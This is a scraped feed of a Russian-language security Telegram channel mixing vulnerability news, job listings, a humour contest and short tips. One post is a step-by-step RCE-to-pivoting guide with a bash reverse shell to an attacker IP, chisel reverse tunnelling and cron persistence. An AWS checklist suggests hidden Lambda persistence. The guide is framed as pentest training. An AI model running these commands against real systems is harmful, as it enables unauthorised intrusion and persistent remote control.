Telegram Group »
Ukraine »
Библиотека хакера | Hacking Infosec ИБ информационная безопасность » Telegram Webview
Каждый год хакеры соревнуются не только в CTF и баунти, но и за престиж. Pentest Award — это премия для тех, кто не просто нашёл баг, а сделал это красиво, эффективно и с пользой. Организатор — компания «Авилликс».
В 2025 году номинаций стало больше, и теперь каждый найдёт своё поле боя:
Новые категории:
Сколько стоит и что получите:
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Это критическая дыра в Cisco IOS XE — прошивке, которую используют маршрутизаторы и коммутаторы.
Что можно после взлома:
• Добавлять/удалять пользователей
• Выполнять команды через CLI
• Полностью управлять устройством
Обновить прошивку. Никаких патчей — только апдейт.
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
Знание их особенностей безопасности становится критически важным для пентестеров. Кроме того, использование Shodan позволяет обнаруживать скрытые ресурсы без доменных имен, расширяя возможности разведки.
Системы, такие как PenTest++, интегрируют генеративный ИИ для оптимизации рабочих процессов, включая разведку, сканирование и эксплуатацию уязвимостей. Это позволяет ускорить рутинные задачи, оставляя больше времени для стратегического анализа.
Пентест в финансовом секторе фокусируется на сложной инфраструктуре и строгих регуляциях. ИИ и автоматические системы помогают быстро выявлять угрозы, а тестирование ИИ-моделей направлено на предотвращение мошенничества.
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
CIA, или триада ЦРУ, — это модель политики ИБ компании.
• конфиденциальность — это перечень нормативов, которые ограничивают доступ к информации компании;
• целостность — гарантия достоверности и точности информации;
• доступность — возможность сотрудникам с правом доступа пользоваться данными.
👍 — если уже знал/а ответ
🌚 — узнал/а новое
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥 Конкурс: 30 000 ₽ за самую смешную IT-новость
Напоминаем о конкурсе «Библиотеки программиста»: напишите самую смешную версию реальной новости про технологии.
👾 Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переписываете ее так, чтобы смеялись все.
3. Получаете деньги и славу.
🎁 Призы:
- 1 место: 30 000 ₽ + статус ведущего нового юмористического IT-канала
- 2 и 3 место: по 5 000 ₽ + вечный почет в IT-сообществе
🏆 Как будем оценивать:
Мы выложим новости всех участников в одном из наших телеграм-каналов. Те новости, которые наберут больше всего охвата, войдут в шорт-лист. Из шорт-листа подписчики и жюри выберут победителя.
📅 Сроки: прием новостей до 11 мая включительно
Для участия отправьте свою смешную новость в гугл-форму: https://forms.gle/6YShjgfiycfJ53LX8
Осталась неделя — ждем ваших новостей!
Напоминаем о конкурсе «Библиотеки программиста»: напишите самую смешную версию реальной новости про технологии.
👾 Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переписываете ее так, чтобы смеялись все.
3. Получаете деньги и славу.
🎁 Призы:
- 1 место: 30 000 ₽ + статус ведущего нового юмористического IT-канала
- 2 и 3 место: по 5 000 ₽ + вечный почет в IT-сообществе
🏆 Как будем оценивать:
Мы выложим новости всех участников в одном из наших телеграм-каналов. Те новости, которые наберут больше всего охвата, войдут в шорт-лист. Из шорт-листа подписчики и жюри выберут победителя.
📅 Сроки: прием новостей до 11 мая включительно
Для участия отправьте свою смешную новость в гугл-форму: https://forms.gle/6YShjgfiycfJ53LX8
Осталась неделя — ждем ваших новостей!
Google Docs
Конкурс на самую смешную IT-новость
Библиотека программиста запускает конкурс, который взорвет вашу ленту: создайте самую смешную альтернативную версию реальной IT-новости!
Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переворачиваете её с ног на голову, чтобы смеялись…
Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переворачиваете её с ног на голову, чтобы смеялись…
Middle/Senior Application Security Engineer — от 250 000 ₽, удаленно (Москва)
Инженер по информационной безопасности — от 160 000 ₽, офис (Екатеринбург)
Pentester в RedTeam команду — 150 000 - 300 000 ₽, удаленно (Москва)
Специалист по информационной безопасности — от 157 500 ₽ , офис (Казань)
Information Security Specialist (Middle) — офис (Санкт-Петербург)
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
Пошаговая инструкция эксплуатации уязвимости RCE с пивотингом во внутреннюю инфраструктуру.
nmap -p 80,443 --script http-vuln* <target_ip>
— ffuf / wfuzz
— Burp Suite Repeater
— curl с параметрами вида:
curl "http://target.com/test.php?cmd=id"
⚠️ Многие RCE не обнаруживаются автоматикой — критично вручную проверить подозрительные поля на injection, command chaining (&&, |, ;), base64.
Если выполнение подтверждено (например, id, uname -a), готовим обратную оболочку.
# Bash reverse shell
bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'
—
python3 -c 'import socket,os,...'
—
php -r '...reverse shell...'
— perl, nc -e, curl | sh
— в зависимости от окруженияnc -lvnp 4444
Например, chisel:
# На атакующей машине
chisel server -p 8000 --reverse
# На целевой (из полученной shell)
./chisel client <attacker_ip>:8000 R:1080:socks
⚠️ Компилируй chisel под ОС и архитектуру цели (GOOS=linux GOARCH=amd64 или windows/386 и т.д.)
Настрой файл /etc/proxychains.conf на:
socks5 127.0.0.1 1080
proxychains nmap -sT -Pn -p 80,443 10.0.0.0/24
⚠️ Только TCP, только -sT. Для UDP/ICMP — использовать socat или meterpreter route.
- cronjob:
* * * * * bash -i >& /dev/tcp/<ip>/4444 0>&1
- systemd:
.service
с автозапуском- загрузка агента
Metasploit
- использование
ssh-keygen
и подмена .ssh/authorized_keys
🧠 Примечания:
• Проверяй антивирусы, EDR, IDS — chisel, meterpreter, nc часто палятся.
• Под каждую цель адаптируй инструменты: Windows = PowerShell и plink; Linux = socat, bash.
⚠️ Disclaimer:
Все действия описаны исключительно в образовательных целях. Проведение описанных операций без разрешения владельца системы является нарушением закона.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
Google выпустила майский патч безопасности Android — устранил 46 уязвимостей, но одна из них уже используется в атаках.
CVE-2025-27363 (CVSS 8.1) — критическая дыра в библиотеке FreeType, позволяет выполнить код без взаимодействия с пользователем. Ошибка устранена в FreeType 2.13.0+.
Обновление от 5 мая устраняет также баги в ядре, фреймворке, GPU PowerVR, ARM Mali, модемах MediaTek и чипах Qualcomm.
Теперь Android — это не только прошивка. Безопасность зависит от Google Play Protect и Project Mainline. Проверьте, актуален ли ваш патч
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
Эта команда позволяет мониторить файл аутентификации в режиме реального времени, фильтруя события, связанные с SSH:
tail -f /var/log/auth.log | grep ssh
tail -f
— выводит новые строки по мере их появления.grep ssh
— фильтрует только те строки, которые содержат информацию об SSH. Используется для:
• Отслеживания попыток подключения по SSH.
• Выявления неудачных попыток входа.
• Мониторинга активности пользователей.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
• Зафиксируйте цели, допустимые действия, допустимый ущерб (ROE)
• Определить зону тестирования и уточните какие сервисы используются (EC2, S3, IAM, Lambda и т.д.)
• Включите логирование — CloudTrail, GuardDuty
• Определите публичные сервисы/ресурсы: S3-бакеты, API Gateway, EC2-инстансы
• Проверьте открытые DNS-записи (dig, nslookup, Amass)
• Проверьте на наличие избыточных прав (например, *:* в политиках)
• Поищите роли, которые можно перехватить или эскалировать
• Проверьте учетные данные в переменных среды, Lambda, EC2 UserData
• Найдите публичные бакеты
aws s3 ls s3://bucket-name --no-sign-request
• Проверьте разрешения: чтение, запись, листинг
s3:ListBucket, s3:GetObject
• Попробуйте bucket takeover через DNS или CNAME
• Проанализируйте Security Groups и NACLs: открытые порты, экспонированные сервисы
• Поищите интернал-сервисов через разрешённые VPC endpoints
• Протестируйте API на ошибки (XSS, IDOR, Injection)
• Поищите секреты в ENV, логи, исходный код
• Исследуйте другие регионы, сервисы, связанные аккаунты
• Создайте скрытые Lambda-функции или роли с автоматическим запуском.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Кверти — подкаст о кибербезе без скучных лекций. Его ведут специалист по информационной безопасности и параноик-энтузиаст, который всегда ждёт подвоха.
Они обсуждают, как устроен мир цифровых угроз, на чем ловят пользователей и что на самом деле происходит за кулисами индустрии защиты.
Рекомендуемые выпуски:
Практика, сертификация BSCP, реальные вызовы и влияние на карьеру.
Немного истории появления пентеста, обсуждению личности Кевина Митника и различиям между видами пентеста.
Разница с пентестерами и AppSec, старт в баг-баунти и типичные ошибки.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
Если вы ищете работу в ИБ, вакансия — это первое, что говорит о зрелости процессов в компании.
Что в статье:
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
Вы видите, что кнопка «Удалить пользователя» доступна только администраторам, вы не авторизованы как админ, но знаете URL и параметры.
На другой странице вы нашли следующий HTML-код формы:
<form action="/deleteUser?id=5" method="POST">
Правильный ответ:
Даже если пользователь не видит кнопку, он может:
— Сформировать POST-запрос вручную (через Postman, curl, Burp),
— Создать собственную HTML-форму и отправить её.
Если сервер выполняет запрос без проверки прав доступа — это критическая ошибка авторизации.
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
Менеджер по защите ИТ инфраструктуры — гибрид/удаленка (Москва)
Инженер по информационной безопасности (AppSec) — офис/гибрид (Москва)
DevSecOps Engineer — 300 000 — 350 000 ₽, удаленно (Москва)
DevSecOps — удаленно/гибрид (Москва)
Инженер по информационной безопасности — от 310 000 ₽, удаленно (Москва)
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM